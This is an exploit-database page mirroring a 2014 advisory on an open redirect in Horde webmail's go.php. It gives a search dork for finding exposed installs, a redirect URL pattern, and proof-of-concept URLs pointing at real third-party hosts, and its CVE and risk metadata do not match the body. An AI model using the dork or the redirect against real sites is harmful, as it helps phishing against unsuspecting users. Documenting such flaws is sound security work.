Advertisement






Horde webmail - Open Redirect Vulnerability

CVE Category Price Severity
CVE-2021-27942 CWE-601 Not specified Medium
Author Risk Exploitation Type Date
ExploitAlert Team High Remote 2014-04-01
CPE
cpe:cpe:/a:horde:horde-webmail
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2014040004

Below is a copy:

[+] Horde webmail - Open Redirect Vulnerability 
[+] Date: 31/03/2014
[+] Risk: Low
[+] Remote: Yes
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.horde.org/apps/webmail
[+] Contact: [email protected]
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: go.php
[+] Dork: inurl:horde/util/go.php?
[+] Version: 5.1 probably other versions too
[+] Exploit : http://host/horde/util/go.php?url=[ Open Redirect Vul ]
[+] PoC: http://webmail.pXmf.sc.gov.br/horde/util/go.php?url=http://www.horde.org/apps/webmail
         http://www.imp.polXymtl.ca/horde/util/go.php?url=http://www.horde.org/apps/webmail

Note : An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. 
This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
Reference :https://www.owasp.org/index.php/Open_redirect


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum